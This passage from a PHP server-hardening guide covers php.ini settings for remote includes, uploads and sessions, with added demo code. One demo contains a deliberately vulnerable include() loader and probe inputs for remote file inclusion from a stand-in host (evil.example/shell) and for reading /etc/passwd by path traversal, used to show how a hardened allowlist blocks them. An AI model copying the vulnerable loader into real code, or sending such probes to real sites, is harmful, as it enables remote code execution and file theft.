This prevents remote scripts from being included and executed by scripts on your system. Two caveats: allow_url_include only exists from PHP 5.2 onward (and is Off by default), and allow_url_fopen = Off also stops legitimate code from reading http:// or ftp:// URLs with fopen(), file_get_contents() and friends (the cURL extension is unaffected), so check that nothing on the server depends on it. These settings also do nothing against local file inclusion: if user input reaches include() or require() unvalidated, an attacker can still include files that are already on the server, so the application must validate include paths regardless.
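To show what the php.ini settings do and do not cover, here is an added example (not code from the original post): a template loader of the kind that turns into a file inclusion bug, next to a hardened version that validates the include path itself. The directory layout, page names and probe inputs are constructed for the demo.

```php
<?php
// Added example, not part of the original post: a template loader of the kind
// that turns into a file inclusion bug, next to a hardened version. The
// directory layout, page names and probes are constructed for the demo.

// --- Vulnerable: request data reaches include() unchanged ------------------
//   index.php?page=pages/about                -> pages/about.php (intended)
//   index.php?page=http://evil.example/shell  -> http://evil.example/shell.php
//                                                is fetched and executed when
//                                                allow_url_include = On
//   index.php?page=../../../../etc/passwd%00  -> local file read on PHP before
//                                                5.3.4, whatever the
//                                                allow_url_* settings are
function vulnerable_load(string $page): void
{
    include $page . '.php';
}

// --- Hardened ---------------------------------------------------------------
// 1. accept only names the application knows,
// 2. build the path from a fixed base directory,
// 3. confirm with realpath() that the result is still inside that directory.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function resolve_page(string $baseDir, string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;                                    // unknown page name
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                    // missing, or outside the base
    }
    return $path;
}

function hardened_load(string $baseDir, string $page): void
{
    $path = resolve_page($baseDir, $page);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page', PHP_EOL;
        return;
    }
    include $path;
}

// Demo: a throwaway pages/ directory holding one real template.
$pages = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($pages);
file_put_contents($pages . '/about.php',
    '<?php echo "about page rendered", PHP_EOL;' . PHP_EOL);

$probes = ['about', 'contact', 'http://evil.example/shell',
           '../../../../etc/passwd', "about\0"];
foreach ($probes as $probe) {
    printf("%-32s => %s\n", addcslashes($probe, "\0"),
           resolve_page($pages, $probe) ?? 'rejected');
}
hardened_load($pages, 'about');
hardened_load($pages, 'http://evil.example/shell');

unlink($pages . '/about.php');
rmdir($pages);
```

Only 'about' resolves; 'contact' is an allowed name but has no file, and the URL, traversal and null-byte probes never reach realpath() because the allowlist rejects them first. The allowlist is the control that matters; the realpath() check is a second line of defence for the day someone loosens the allowlist.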

Restrict File Uploads

If none of your PHP scripts use file upload functionality, turn it off. Attackers misuse file uploads to get malicious scripts onto a web server quickly, and disabling uploads altogether makes that considerably harder. To disable file uploads change the file_uploads directive in your php.ini to read:

file_uploads = Off
Even if you do allow file uploads you should change the temporary directory used for uploads with the upload_tmp_dir directive: pick a directory outside the web root that only the web server user can read and write, so that uploaded files are never reachable by URL before the application has processed them. You may also want to limit the size of files that can be uploaded with upload_max_filesize. This is more a resource-management setting than a security fix, but it limits how quickly an attacker can fill the disk. Note that post_max_size must be at least as large as upload_max_filesize or uploads will fail. To set the upload directory and size limit change your php.ini so that it reads:

upload_tmp_dir = /var/php_tmp
upload_max_filesize = 2M

Protect Session Cookies

Session hijacking is a popular attack in which a malicious user takes over the session of a legitimate user, bypassing authentication and reaching parts of the application they are not authorised for. PHP uses long, pseudo-randomly generated session identifiers, so guessing one is impractical: when you log in to a PHP application you will likely find a cookie named PHPSESSID with a value such as 'bbbca6bb7a23bdc8de3baef2b506e654', 32 hexadecimal characters (128 bits) by default. The weak point is not the identifier but where it is stored. PHP writes each session to a file named sess_<identifier> in session.save_path, which defaults to the system temporary directory (usually /tmp). On a shared host every local user can list that directory and harvest valid session identifiers, and a file disclosure bug in any other application running as the same web server user can read the session data itself. Point session.save_path at a directory that only the web server user can access by setting it in php.ini like so:

 
session.save_path = /var/lib/php

Make sure that the web server can read and write to the location you specify, however, or sessions will not work. You may also want PHP to set its session cookie with the HttpOnly flag so that it is inaccessible to JavaScript; unless you have PHP applications that manipulate the session cookie from JavaScript this is a great idea. Attackers often exploit Cross-Site Scripting (XSS) flaws in web applications to inject JavaScript into pages, and one of the first things such a payload does is read document.cookie and send the session cookie elsewhere. Setting the php.ini directive (available from PHP 5.2 onward):
 
session.cookie_httponly = 1

restricts JavaScript from reading the session cookie. A smaller extra measure is session.referer_check: PHP compares the HTTP Referer header of each request against the substring you configure and, if the header is present but does not contain it, discards the session identifier and starts a new session. This limits the damage when a user accidentally publishes a URL that carries a session identifier to a mailing list or web site, since anyone following that link arrives with a foreign Referer. Requests that carry no Referer at all still pass, so treat this as a mitigation rather than a control; the stronger fix is to keep session identifiers out of URLs entirely with session.use_only_cookies = 1. To enable the Referer check use the following in your php.ini:

session.referer_check = your_url.tld
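Editing php.ini is only half the job; the effective configuration can be changed by .htaccess files, php-fpm pools, or a second php.ini used by a different SAPI (on Debian-style installations the CLI and Apache builds read separate files). The script below is an added example, not part of the original post: it audits every directive discussed above against the values PHP is actually running with, via ini_get(). Run it with php audit.php to see the CLI configuration, or place it under the web root and request it once, then delete it, to see the web SAPI's values. The 2M upload limit is the value suggested above; session.cookie_secure, session.use_only_cookies, post_max_size and the "not the system temp dir" heuristics are extra checks added here.

```php
<?php
// Added example, not part of the original post: audit the php.ini directives
// recommended above against PHP's effective configuration using ini_get().
// session.cookie_secure, session.use_only_cookies, post_max_size and the
// "not the system temp dir" heuristics are additions beyond the article.

/** Read a boolean directive; null if this PHP build does not know it at all. */
function ini_bool(string $name): ?bool
{
    $v = ini_get($name);
    if ($v === false) {
        return null;
    }
    $b = filter_var($v, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
    return $b ?? true;      // unusual spellings such as display_errors=stderr still mean "on"
}

/** Convert PHP shorthand sizes ("2M", "512K", "1G") to bytes. */
function ini_bytes(string $v): int
{
    $v = trim($v);
    $n = (int) $v;
    switch (strtoupper(substr($v, -1))) {
        case 'G': return $n << 30;
        case 'M': return $n << 20;
        case 'K': return $n << 10;
        default:  return $n;
    }
}

/** Returns ['directive' => [bool passed, string detail], ...]. */
function run_audit(): array
{
    $r = [];
    $check = function (string $name, bool $ok, string $detail) use (&$r) {
        $r[$name] = [$ok, $detail];
    };

    $check('display_errors', ini_bool('display_errors') === false,
           'value=' . var_export(ini_get('display_errors'), true));

    $rg = ini_bool('register_globals');
    $check('register_globals', $rg !== true,
           $rg === null ? 'directive absent (removed in PHP 5.4)'
                        : 'value=' . var_export(ini_get('register_globals'), true));

    foreach (['allow_url_fopen', 'allow_url_include'] as $d) {
        $check($d, ini_bool($d) !== true, 'value=' . var_export(ini_get($d), true));
    }

    if (ini_bool('file_uploads') === true) {
        $check('file_uploads', true, 'enabled, see the two upload checks');
        $dir = (string) ini_get('upload_tmp_dir');
        $check('upload_tmp_dir', $dir !== '' && is_dir($dir) && $dir !== sys_get_temp_dir(),
               $dir === '' ? 'unset, falls back to the system temp dir' : "dir=$dir");
        $max  = ini_bytes((string) ini_get('upload_max_filesize'));
        $post = ini_bytes((string) ini_get('post_max_size'));
        $check('upload_max_filesize', $max <= 2 * 1024 * 1024 && $post >= $max,
               "upload_max_filesize=$max bytes, post_max_size=$post bytes");
    } else {
        $check('file_uploads', true, 'disabled');
    }

    // session.save_path may be "N;/path" or "N;mode;/path"; keep the path part.
    $sp   = (string) ini_get('session.save_path');
    $path = substr(strrchr(';' . $sp, ';'), 1);
    $worldReadable = $path !== '' && is_dir($path) && (fileperms($path) & 0004) !== 0;
    $check('session.save_path',
           $path !== '' && is_dir($path) && $path !== sys_get_temp_dir() && !$worldReadable,
           $path === '' ? 'unset, sessions land in the system temp dir'
                        : "dir=$path" . ($worldReadable ? ' (world-readable)' : ''));

    foreach (['session.cookie_httponly', 'session.cookie_secure', 'session.use_only_cookies'] as $d) {
        $check($d, ini_bool($d) === true, 'value=' . var_export(ini_get($d), true));
    }
    $check('session.referer_check', (string) ini_get('session.referer_check') !== '',
           'value=' . var_export(ini_get('session.referer_check'), true));

    return $r;
}

$failed = 0;
foreach (run_audit() as $name => [$ok, $detail]) {
    printf("%-26s %s  %s\n", $name, $ok ? 'PASS' : 'FAIL', $detail);
    $failed += $ok ? 0 : 1;
}
exit($failed > 0 ? 1 : 0);
```

A non-zero exit status means at least one directive differs from the recommendation, which makes the script usable from a configuration-management or deployment check. session.cookie_secure will fail on a site served over plain HTTP; that is the point of the check, since a session cookie sent over HTTP can be read by anyone on the path.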

 Source - Tech_Mantras
 

 Happy Hacking

 

 
 
 
 
